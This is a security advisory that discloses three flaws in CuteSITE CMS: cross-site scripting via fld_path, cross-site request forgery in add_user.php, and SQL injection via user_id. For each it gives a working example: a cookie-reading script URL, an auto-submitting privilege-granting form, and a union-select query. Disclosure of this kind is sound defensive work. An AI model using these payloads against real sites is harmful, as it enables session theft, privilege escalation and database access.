High-Tech Bridge SA Security Research Lab has discovered three vulnerabilities in CuteSITE CMS which could be exploited to perform cross-site scripting and cross-site request forgery attacks and execute arbitrary SQL commands in application`s database.
Cross-site scripting (XSS) vulnerability in CuteSITE CMS: CVE-2010-5025
The vulnerability exists due to input sanitation error in the “fld_path” parameter in manage/main.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://host/manage/main.php?fld_path=XXX<script>alert(document.cookie% 29%3C/script%3E
Cross-site request forgery (CSRF) in CuteSITE CMS
The vulnerability exists due to insufficient validation of the request origin in manage/add_user.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and assign arbitrary privileges to registered users.
Exploitation example:
<FORM action=“http://host/manage/add_user.php” method=“POST” name=“main”>
<input type=“hidden” name=“fld_priv” value=“W”>
<input type=“hidden” name=“tpl_priv” value=“W”>
<input type=“hidden” name=“img_priv” value=“W”>
<input type=“hidden” name=“str_priv” value=“W”>
<input type=“hidden” name=“txt_priv” value=“W”>
<input type=“hidden” name=“var_priv” value=“W”>
<input type=“hidden” name=“snp_priv” value=“W”>
<input type=“hidden” name=“usr_priv” value=“W”>
<input type=“hidden” name=“hst_priv” value=“W”>
<input type=“hidden” name=“plg_priv” value=“W”>
<INPUT type=“hidden” name=“user_id” value=“33”>
<INPUT type=“hidden” name=“user_login” value=“userlogin”>
<INPUT type=“hidden” name=“action” value=“Modify”>
</FORM>
<script>
document.main.submit()
</script>
SQL injection vulnerability in CuteSITE CMS: CVE-2010-5024
The vulnerability exists due to input sanitation error in the “user_id” parameter in manage/add_user.php. A remote attacker can send a specially crafted HTTP GET request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database but requires “Read” permissions for “Users”.
Exploitation example:
http://host/manage/add_user.php?user_id=-1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,user%28%29,15,16